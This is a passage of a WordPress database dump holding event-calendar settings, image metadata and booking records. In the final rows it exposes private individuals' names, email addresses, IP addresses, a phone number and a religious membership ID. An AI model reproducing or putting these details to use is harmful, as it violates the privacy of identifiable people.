4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182550,268447,'mec_tickets','a:0:{}'),(182551,268447,'mec_fees_global_inheritance','1'),(182552,268447,'mec_fees','a:0:{}'),(182553,268447,'mec_ticket_variations_global_inheritance','1'),(182554,268447,'mec_ticket_variations','a:0:{}'),(182555,268447,'mec_reg_fields_global_inheritance','1'),(182556,268447,'mec_reg_fields','a:0:{}'),(182557,268447,'mec_op','a:0:{}'),(182558,268447,'mec_event_date_submit','20210422105713'),(182559,268447,'mec_read_more',''),(182560,268447,'mec_more_info',''),(182561,268447,'mec_more_info_title',''),(182562,268447,'mec_more_info_target','_self'),(182563,268447,'mec_cost',''),(182564,268447,'mec_currency','a:0:{}'),(182565,268447,'mec_additional_organizer_ids','a:0:{}'),(182566,268447,'mec_additional_location_ids','a:0:{}'),(182567,268447,'one_occurrence','0'),(182568,268447,'mec_timezone','global'),(182569,268447,'mec_countdown_method','global'),(182570,268447,'mec_public','1'),(182571,268447,'mec_bfixed_fields','a:0:{}'),(182572,268447,'mec_fields','a:0:{}'),(182573,268447,'mec_event_status','EventScheduled'),(182574,268447,'mec_moved_online_link',''),(182575,268447,'mec_cancelled_reason',''),(182576,268447,'mec_display_cancellation_reason_in_single_page',''),(182577,268447,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(182578,268447,'passster_activate_global_protection',NULL),(182579,268447,'passster_activate_protection',NULL),(182580,268447,'passster_protection_type','password'),(182581,268447,'_wp_old_date','2022-01-18'),(182582,268447,'boldgrid_in_page_containers','1'),(182586,268447,'_dp_original','266827'),(182584,268447,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(182585,268447,'passster_area_shortcode',''),(182587,268447,'_edit_lock','1683517026:2'),(182588,268447,'_edit_last','2'),(182867,268461,'protect_children',''),(182869,268461,'mec_location_id','166'),(182868,268461,'mec_color',''),(182614,268450,'mec_additional_organizer_ids','a:0:{}'),(182601,268449,'smush-info','The file was compressed from 69.03 KB to 67.47 KB saving 2.26 percent using WP-Optimize'),(182602,268449,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70685;s:12:\"smushed-size\";i:69087;s:15:\"savings-percent\";d:2.2599999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:70685;s:10:\"compressed\";i:69087;}s:6:\"medium\";a:2:{s:8:\"original\";i:12769;s:10:\"compressed\";i:12769;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6961;s:10:\"compressed\";i:6961;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:54932;s:10:\"compressed\";i:54791;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19868;s:10:\"compressed\";i:19868;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31022;s:10:\"compressed\";i:31003;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22424;s:10:\"compressed\";i:22424;}s:8:\"tileview\";a:2:{s:8:\"original\";i:21984;s:10:\"compressed\";i:21984;}}}'),(182603,268450,'protect_children',''),(182604,268450,'mec_color',''),(182605,268450,'mec_location_id','171'),(182606,268450,'mec_dont_show_map','0'),(182607,268450,'mec_organizer_id','1'),(182608,268450,'mec_read_more',''),(182609,268450,'mec_more_info',''),(182610,268450,'mec_more_info_title',''),(182611,268450,'mec_more_info_target','_self'),(182612,268450,'mec_cost',''),(182613,268450,'mec_currency','a:0:{}'),(182600,268449,'smush-complete','1'),(182598,268447,'_thumbnail_id','268449'),(182599,268449,'original-file','2023/05/hu-8-updraft-pre-smush-original.jpg'),(182596,268449,'_wp_attached_file','2023/05/hu-8.jpg'),(182597,268449,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:803;s:6:\"height\";i:450;s:4:\"file\";s:16:\"2023/05/hu-8.jpg\";s:8:\"filesize\";i:70685;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"hu-8-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12769;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"hu-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6961;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"hu-8-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54932;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:16:\"hu-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19868;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:16:\"hu-8-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31022;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:16:\"hu-8-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22424;}s:8:\"tileview\";a:5:{s:4:\"file\";s:16:\"hu-8-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21984;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182615,268450,'mec_additional_location_ids','a:0:{}'),(182616,268450,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-18\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-18\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182617,268450,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182618,268450,'mec_certain_weekdays','a:0:{}'),(182619,268450,'mec_allday','0'),(182620,268450,'one_occurrence','0'),(182621,268450,'mec_hide_time','0'),(182622,268450,'mec_hide_end_time','0'),(182623,268450,'mec_comment',''),(182624,268450,'mec_timezone','global'),(182625,268450,'mec_countdown_method','global'),(182626,268450,'mec_public','1'),(182627,268450,'mec_start_date','2023-05-18'),(182628,268450,'mec_start_time_hour','7'),(182629,268450,'mec_start_time_minutes','0'),(182630,268450,'mec_start_time_ampm','PM'),(182631,268450,'mec_start_day_seconds','68400'),(182632,268450,'mec_end_date','2023-05-18'),(182633,268450,'mec_end_time_hour','8'),(182634,268450,'mec_end_time_minutes','0'),(182635,268450,'mec_end_time_ampm','PM'),(182636,268450,'mec_end_day_seconds','72000'),(182637,268450,'mec_repeat_status','0'),(182638,268450,'mec_repeat_type',''),(182639,268450,'mec_repeat_interval','1'),(182640,268450,'mec_repeat_end',''),(182641,268450,'mec_repeat_end_at_occurrences',''),(182642,268450,'mec_repeat_end_at_date',''),(182643,268450,'mec_advanced_days','a:0:{}'),(182644,268450,'mec_in_days',''),(182645,268450,'mec_not_in_days',''),(182646,268450,'mec_hourly_schedules','a:0:{}'),(182647,268450,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182648,268450,'mec_tickets','a:0:{}'),(182649,268450,'mec_fees_global_inheritance','1'),(182650,268450,'mec_fees','a:0:{}'),(182651,268450,'mec_ticket_variations_global_inheritance','1'),(182652,268450,'mec_ticket_variations','a:0:{}'),(182653,268450,'mec_reg_fields_global_inheritance','1'),(182654,268450,'mec_reg_fields','a:0:{}'),(182655,268450,'mec_bfixed_fields','a:0:{}'),(182656,268450,'mec_op','a:0:{}'),(182657,268450,'mec_fields','a:0:{}'),(182658,268450,'mec_event_status','EventScheduled'),(182659,268450,'mec_moved_online_link',''),(182660,268450,'mec_cancelled_reason',''),(182661,268450,'mec_display_cancellation_reason_in_single_page',''),(182662,268450,'boldgrid_hide_page_title','0'),(182663,268450,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(182664,268450,'passster_activate_global_protection',NULL),(182665,268450,'passster_activate_protection',NULL),(182666,268450,'passster_protection_type','password'),(182667,268450,'boldgrid_in_page_containers','1'),(182668,268450,'passster_area_shortcode',''),(182669,268450,'_dp_original','265240'),(182670,268450,'_edit_lock','1683310699:2'),(182671,268450,'_edit_last','2'),(182672,268451,'_wp_attached_file','2023/05/aspens-closeup-1.jpg'),(182673,268451,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:767;s:6:\"height\";i:431;s:4:\"file\";s:28:\"2023/05/aspens-closeup-1.jpg\";s:8:\"filesize\";i:96445;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"aspens-closeup-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19218;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"aspens-closeup-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9205;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"aspens-closeup-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26669;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"aspens-closeup-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43352;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"aspens-closeup-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31912;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"aspens-closeup-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30858;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182674,268450,'_thumbnail_id','268451'),(182675,268452,'protect_children',''),(182676,268452,'mec_color',''),(182677,268452,'mec_location_id','165'),(182678,268452,'mec_dont_show_map','0'),(182679,268452,'mec_organizer_id','1'),(182680,268452,'mec_read_more',''),(182681,268452,'mec_more_info',''),(182682,268452,'mec_more_info_title',''),(182683,268452,'mec_more_info_target','_self'),(182684,268452,'mec_cost',''),(182685,268452,'mec_currency','a:0:{}'),(182686,268452,'mec_additional_organizer_ids','a:0:{}'),(182687,268452,'mec_additional_location_ids','a:0:{}'),(182688,268452,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182689,268452,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182690,268452,'mec_certain_weekdays','a:0:{}'),(182691,268452,'mec_allday','0'),(182692,268452,'one_occurrence','0'),(182693,268452,'mec_hide_time','0'),(182694,268452,'mec_hide_end_time','0'),(182695,268452,'mec_comment',''),(182696,268452,'mec_timezone','global'),(182697,268452,'mec_countdown_method','global'),(182698,268452,'mec_public','1'),(182699,268452,'mec_start_date','2023-05-11'),(182700,268452,'mec_start_time_hour','7'),(182701,268452,'mec_start_time_minutes','0'),(182702,268452,'mec_start_time_ampm','PM'),(182703,268452,'mec_start_day_seconds','68400'),(182704,268452,'mec_end_date','2023-05-11'),(182705,268452,'mec_end_time_hour','8'),(182706,268452,'mec_end_time_minutes','0'),(182707,268452,'mec_end_time_ampm','PM'),(182708,268452,'mec_end_day_seconds','72000'),(182709,268452,'mec_repeat_status','0'),(182710,268452,'mec_repeat_type',''),(182711,268452,'mec_repeat_interval','1'),(182712,268452,'mec_repeat_end',''),(182713,268452,'mec_repeat_end_at_occurrences',''),(182714,268452,'mec_repeat_end_at_date',''),(182715,268452,'mec_advanced_days','a:0:{}'),(182716,268452,'mec_in_days',''),(182717,268452,'mec_not_in_days',''),(182718,268452,'mec_hourly_schedules','a:0:{}'),(182719,268452,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182720,268452,'mec_tickets','a:0:{}'),(182721,268452,'mec_fees_global_inheritance','1'),(182722,268452,'mec_fees','a:0:{}'),(182723,268452,'mec_ticket_variations_global_inheritance','1'),(182724,268452,'mec_ticket_variations','a:0:{}'),(182725,268452,'mec_reg_fields_global_inheritance','1'),(182726,268452,'mec_reg_fields','a:0:{}'),(182727,268452,'mec_bfixed_fields','a:0:{}'),(182728,268452,'mec_op','a:0:{}'),(182729,268452,'mec_fields','a:0:{}'),(182730,268452,'mec_event_status','EventScheduled'),(182731,268452,'mec_moved_online_link',''),(182732,268452,'mec_cancelled_reason',''),(182733,268452,'mec_display_cancellation_reason_in_single_page',''),(182734,268452,'boldgrid_hide_page_title','0'),(182735,268452,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(182736,268452,'passster_activate_global_protection',NULL),(182737,268452,'passster_activate_protection',NULL),(182738,268452,'passster_protection_type','password'),(182739,268452,'boldgrid_in_page_containers','1'),(182740,268452,'passster_area_shortcode',''),(182741,268452,'_dp_original','265240'),(182742,268452,'_edit_lock','1683517507:2'),(182743,268451,'original-file','2023/05/aspens-closeup-1-updraft-pre-smush-original.jpg'),(182744,268451,'smush-complete','1'),(182745,268451,'smush-info','The file was compressed from 94.18 KB to 90.21 KB saving 4.22 percent using WP-Optimize'),(182746,268451,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:96445;s:12:\"smushed-size\";i:92371;s:15:\"savings-percent\";d:4.21999999999999975131004248396493494510650634765625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:96445;s:10:\"compressed\";i:92371;}s:6:\"medium\";a:2:{s:8:\"original\";i:19218;s:10:\"compressed\";i:18868;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9205;s:10:\"compressed\";i:9139;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:26669;s:10:\"compressed\";i:26422;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:43352;s:10:\"compressed\";i:42873;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:31912;s:10:\"compressed\";i:31436;}s:8:\"tileview\";a:2:{s:8:\"original\";i:30858;s:10:\"compressed\";i:30681;}}}'),(182747,268452,'_edit_last','2'),(182748,268454,'_wp_attached_file','2023/05/temple-columns-master.jpg'),(182749,268454,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:785;s:6:\"height\";i:441;s:4:\"file\";s:33:\"2023/05/temple-columns-master.jpg\";s:8:\"filesize\";i:89900;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17850;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7790;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74351;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21743;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37020;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27524;}s:8:\"tileview\";a:5:{s:4:\"file\";s:33:\"temple-columns-master-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23315;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182750,268452,'_thumbnail_id','268454'),(182751,268454,'original-file','2023/05/temple-columns-master-updraft-pre-smush-original.jpg'),(182752,268454,'smush-complete','1'),(182753,268454,'smush-info','The file was compressed from 87.79 KB to 85.02 KB saving 3.16 percent using WP-Optimize'),(182754,268454,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:89900;s:12:\"smushed-size\";i:87061;s:15:\"savings-percent\";d:3.160000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:89900;s:10:\"compressed\";i:87061;}s:6:\"medium\";a:2:{s:8:\"original\";i:17850;s:10:\"compressed\";i:17615;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7790;s:10:\"compressed\";i:7724;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:74351;s:10:\"compressed\";i:73559;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21743;s:10:\"compressed\";i:21743;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:37020;s:10:\"compressed\";i:36764;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27524;s:10:\"compressed\";i:27261;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23315;s:10:\"compressed\";i:23315;}}}'),(184441,268605,'mec_gateway_label','Free'),(184440,268605,'mec_gateway','MEC_gateway_free'),(184439,268605,'mec_price','0'),(184434,268605,'mec_attention_time_end','1686483000'),(184435,268605,'mec_book_date_submit','20230606185419'),(184436,268605,'mec_booking_location','129'),(184437,268605,'mec_ticket_price_1','0'),(184438,268605,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"Molliesch@gmail.com\";s:4:\"name\";s:6:\"Mollie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"72.19.140.138\";}}'),(184431,268605,'mec_other_dates','a:0:{}'),(184432,268605,'mec_attention_time','1686479400:1686483000'),(184433,268605,'mec_attention_time_start','1686479400'),(184430,268605,'mec_all_dates','a:0:{}'),(184429,268605,'mec_booking_time','2023-06-06 18:54:19'),(184428,268605,'mec_ticket_id',',1,'),(184427,268605,'mec_date','1686479400:1686483000'),(184426,268605,'mec_event_id','268482'),(184425,268605,'mec_confirmed','1'),(184424,268605,'mec_cancellation_key','7fd2cd56abb358bf54451608be15ddaa'),(184423,268605,'mec_verification_key','c21dd2636ef89bd2ced667df63d03552'),(184422,268605,'mec_verified','1'),(184421,268605,'mec_user_id','1000084'),(184420,268605,'mec_transaction_id','OUW18714'),(184419,268602,'mec_gateway_label','Free'),(184418,268602,'mec_gateway','MEC_gateway_free'),(184417,268602,'mec_price','0'),(184416,268602,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"63.151.20.106\";}}'),(184403,268602,'mec_confirmed','1'),(184404,268602,'mec_event_id','268482'),(184405,268602,'mec_date','1686479400:1686483000'),(184406,268602,'mec_ticket_id',',1,'),(184407,268602,'mec_booking_time','2023-06-06 09:38:02'),(184408,268602,'mec_all_dates','a:0:{}'),(184409,268602,'mec_other_dates','a:0:{}'),(184410,268602,'mec_attention_time','1686479400:1686483000'),(184411,268602,'mec_attention_time_start','1686479400'),(184412,268602,'mec_attention_time_end','1686483000'),(184413,268602,'mec_book_date_submit','20230606093802'),(184414,268602,'mec_booking_location','129'),(184415,268602,'mec_ticket_price_1','0'),(184402,268602,'mec_cancellation_key','9a4861513559bcd19aa9a52bc86fc978'),(184401,268602,'mec_verification_key','448002bd22d2b66ec35de84090cc9d32'),(184400,268602,'mec_verified','1'),(184399,268602,'mec_user_id','1000024'),(184398,268602,'mec_transaction_id','JUR56597'),(184397,268601,'mec_gateway_label','Free'),(184396,268601,'mec_gateway','MEC_gateway_free'),(184395,268601,'mec_price','0'),(184384,268601,'mec_ticket_id',',1,'),(184385,268601,'mec_booking_time','2023-06-05 15:01:23'),(184386,268601,'mec_all_dates','a:0:{}'),(184387,268601,'mec_other_dates','a:0:{}'),(184388,268601,'mec_attention_time','1686479400:1686483000'),(184389,268601,'mec_attention_time_start','1686479400'),(184390,268601,'mec_attention_time_end','1686483000'),(184391,268601,'mec_book_date_submit','20230605150123'),(184392,268601,'mec_booking_location','129'),(184393,268601,'mec_ticket_price_1','0'),(184394,268601,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"108.180.206.226\";}}'),(184383,268601,'mec_date','1686479400:1686483000'),(184382,268601,'mec_event_id','268482'),(184381,268601,'mec_confirmed','1'),(184380,268601,'mec_cancellation_key','b4a585bc26ccbff1d17c289076db83fd'),(184379,268601,'mec_verification_key','498417e254b31159c64d459110c74403'),(184377,268601,'mec_user_id','1000077'),(184378,268601,'mec_verified','1'),(184376,268601,'mec_transaction_id','SUT85426'),(182828,268457,'_field_55','Rhonda'),(182829,268457,'_field_56','Miller'),(182830,268457,'_field_57','rhoann9@gmail.com'),(182831,268457,'_field_58','(303) 946-0436'),(182832,268457,'_field_59','Boulder'),(182833,268457,'_field_62','ESA/Initiator-Tom Boston'),(182834,268457,'_field_63','I am please requesting an ESA session. My Eckankar member ID # is 2230316. If there can be a contact preference, my e-mail is best: rhoann9@gmail.com\nThank you.\nIn 